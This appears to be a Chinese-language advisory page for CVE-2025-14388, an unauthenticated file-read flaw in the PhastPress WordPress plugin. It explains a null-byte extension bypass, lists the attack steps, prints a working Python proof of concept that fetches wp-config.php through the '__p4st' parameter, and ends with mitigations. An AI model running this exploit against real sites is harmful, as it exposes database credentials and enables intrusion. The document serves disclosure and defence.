CVE-2025-14388 WordPress PhastPress插件未授权任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2025-14388

漏洞类型

任意文件读取

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PhastPress plugin for WordPress

漏洞概述

CVE-2025-14388是WordPress PhastPress插件中的一个严重安全漏洞，CVSS评分高达9.8分（严重级别）。该漏洞允许未经身份验证的远程攻击者通过构造特殊的URL请求，利用空字节注入技术绕过文件扩展名验证机制，读取Web服务器根目录下的任意文件，包括敏感的配置文件如wp-config.php等。漏洞根源在于PhastPress插件的getExtensionForURL()函数和appendNormalized()函数之间存在逻辑不一致：前者对URL解码后的路径进行扩展名验证，而后者在构建文件系统路径时会截断空字节后的内容。这种设计缺陷使得攻击者可以通过双URL编码的空字节(%2500)配合允许的扩展名(.txt)来绕过安全检查，成功读取任意文件。此漏洞影响PhastPress插件3.7及之前的所有版本，由于无需认证即可利用，且对机密性、完整性和可用性均造成严重影响，建议所有使用该插件的用户立即采取修复措施。

技术细节

漏洞的技术原理基于空字节注入和URL编码绕过技术。PhastPress插件的getExtensionForURL()函数在验证文件扩展名时，使用URL解码后的路径进行检测。例如，当攻击者请求包含%2500.txt的文件时，URL解码后变为%00.txt，此时函数会检查.txt是否为允许的扩展名，由于.txt在白名单中，验证通过。然而，在appendNormalized()函数构建实际文件系统路径时，PHP会将%00（即空字节）视为字符串终止符，截断其后的所有内容。这样攻击者就可以构造如/path/to/wp-config.php%2500.txt的请求，其中%2500双URL编码后解码为一个空字节，最终导致服务器读取wp-config.php文件内容。漏洞利用的关键步骤包括：1) 使用双URL编码的空字节(%2500)绕过扩展名检查；2) 配合允许的扩展名(.txt)通过安全验证；3) 利用空字节截断特性读取任意文件。攻击者通常利用此漏洞读取wp-config.php获取数据库凭据，或读取其他敏感配置文件。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用PhastPress插件（版本<=3.7）

STEP 2

步骤2

攻击者构造恶意URL请求，在文件路径后附加双URL编码的空字节(%2500)和允许的扩展名(.txt)

STEP 3

步骤3

getExtensionForURL()函数对URL解码后的路径进行扩展名验证，由于.txt在白名单中，验证通过

STEP 4

步骤4

appendNormalized()函数在构建文件系统路径时，PHP将%00（空字节）视为字符串终止符，截断其后的.txt扩展名

STEP 5

步骤5

服务器实际读取的是空字节前面的原始文件内容（如wp-config.php），绕过扩展名限制

STEP 6

步骤6

攻击者获取敏感配置文件内容，可能包括数据库凭据、API密钥等高价值信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-14388 PoC - PhastPress Arbitrary File Read
# Target: WordPress site with PhastPress plugin <= 3.7

target_url = "http://target-wordpress-site.com/"

# Read wp-config.php using null byte injection
# %2500 = double URL-encoded null byte
# .txt = allowed extension to bypass getExtensionForURL() check
file_to_read = "wp-config.php"
encoded_null = "%2500"
extension = ".txt"

# Construct the malicious path
malicious_path = f"{file_to_read}{encoded_null}{extension}"

# Full URL to exploit the vulnerability
exploit_url = target_url + "?__p4st=" + malicious_path

print(f"[*] Exploiting CVE-2025-14388")
print(f"[*] Target: {target_url}")
print(f"[*] Attempting to read: {file_to_read}")
print(f"[*] Exploit URL: {exploit_url}")

try:
    response = requests.get(exploit_url, timeout=30)
    
    if response.status_code == 200:
        # Check if we got the actual file content
        if "DB_NAME" in response.text or "<?php" in response.text:
            print("[+] SUCCESS! File content retrieved:")
            print(response.text[:2000])  # Print first 2000 chars
        else:
            print("[-] Response received but file content not detected")
            print(response.text[:500])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

PhastPress plugin <= 3.7 (all versions up to and including 3.7)

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 立即禁用或删除PhastPress插件；2) 对wp-config.php等敏感配置文件设置严格的文件权限（建议设置为400或440）；3) 在Web服务器配置中添加规则，拦截包含%2500、%2500%00或空字节的请求；4) 考虑使用ModSecurity等WAF产品添加自定义规则阻断此类攻击；5) 限制PHP脚本对文件系统根目录的访问权限，使用open_basedir限制访问范围。